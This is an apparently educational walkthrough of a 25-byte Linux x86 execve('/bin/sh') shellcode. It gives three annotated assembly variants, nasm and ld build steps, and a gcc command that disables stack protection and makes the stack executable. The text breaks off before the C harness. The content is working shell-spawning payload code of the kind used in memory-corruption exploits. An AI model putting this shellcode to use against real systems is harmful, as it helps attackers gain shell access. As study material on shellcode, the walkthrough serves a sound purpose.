Linux/x86 - execve /bin/sh Shellcode (25 bytes) Walkthrough

(Updated: )
,
reference Linux/x86 - execve /bin/sh Shellcode (25 bytes)
shellcode.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
global _start

section .text
_start:
    cdq                     ; xor edx
    mul edx
    lea ecx, [eax]                                       ; xor ecx, maybe a problem when embedded in other program
    mov esi, 0x68732f2f
    mov edi, 0x6e69622f
    push ecx                ; push NULL in stack         ; \0
    push esi
    push edi                ; push hs/nib// in stack     ; actually 'hs//nib/'
    lea ebx, [esp]          ; push hs/nib// in stack     ; address of 'hs//nib/'
    mov al, 0xb             ; load execve in eax
    int 0x80                ; execute

Compile and link:

1
2
nasm -f elf32 shellcode.asm -o shellcode.o
ld -m elf_i386 -o shellcode shellcode.o

Debug with r2:

Breakpoint at syscall:

execve:

execve
1
2
3
#include <unistd.h>

int execve(const char *pathname, char *const argv[], char *const envp[]);

This version is derived from the shellcode above, to make the concept clearer:

shellcode-2.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
global _start

section .text
_start:
    xor eax, eax       ; for embedding into other program
    xor edx, edx
    xor ecx, ecx
    push ecx
    push 0x68732f6e
    push 0x69622f2f
    lea ebx, [esp]
    mov al, 0xb
    int 0x80

There’s no need to xor if you want to run this shellcode seperately:

shellcode-standalone.asm
1
2
3
4
5
6
7
8
9
10
11
global _start

section .text
_start:
    push ecx                ; \0, ecx should be 0x0
    push 0x68732f6e
    push 0x69622f2f
                            ; edx should be 0x0
    lea ebx, [esp]
    mov al, 0xb
    int 0x80

Cross compile if in x86_64 with the derived version:

1
2
apt install gcc-multilib
gcc -fno-stack-protector -z execstack -m32 ./shellcode.c

Add the shellcode into a C program: